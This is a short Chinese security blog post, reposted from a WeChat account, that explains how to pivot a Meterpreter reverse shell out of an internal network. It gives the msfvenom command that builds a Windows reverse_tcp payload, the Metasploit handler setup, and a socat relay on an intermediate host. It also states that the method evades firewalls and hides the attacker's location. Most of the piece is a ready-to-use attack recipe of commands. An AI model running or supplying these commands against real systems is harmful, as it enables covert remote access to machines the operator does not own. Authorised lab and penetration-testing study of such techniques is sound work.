内网转发连接外网meterpreter

admin 2022年3月28日09:33:32评论101 views字数 725阅读2分25秒阅读模式






点击上方“蓝字”,发现更多精彩。

内网转发连接外网meterpreter


1
说明

在多个或者两个不网络中使用正向连接远程的攻击载荷,但是有时会有限制,如防火墙干扰拦截,同时也会暴露我们在网络中的位置。让攻击载荷反向连接 meterpreter 同时也能隐藏攻击者在网络的位置。

10.10.10.132 连接上 10.10.10.147 再通过 192.168.0.156连接上 kali  192.168.0.119

如图

内网转发连接外网meterpreter

可以使用socat重定向攻击载荷 连接上meterpreter。


2
操作步骤


1 生成攻击载荷

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.147 lport=12345 -f exe >~/Desktop/lab/s.exe

metasploit 执行

msf5 >  use exploit/multi/handler
msf5 exploit(multi/handler) >  set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set prot 12345
prot => 12345
exploit

2 执行socat命令

在192.168.0.156机子上执行

socat TCP4-LISTEN:12345,reuseaddr,fork TCP4:192.168.0.119:4444

3.在内网目标上执行生成的攻击载荷。


内网转发连接外网meterpreter

温馨提示

如果你喜欢本文,请分享到朋友圈,想要获得更多信息,请关注我。





原文始发于微信公众号(moonsec):内网转发连接外网meterpreter

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月28日09:33:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网转发连接外网meterpreterhttps://cn-sec.com/archives/565510.html

发表评论

匿名网友 填写信息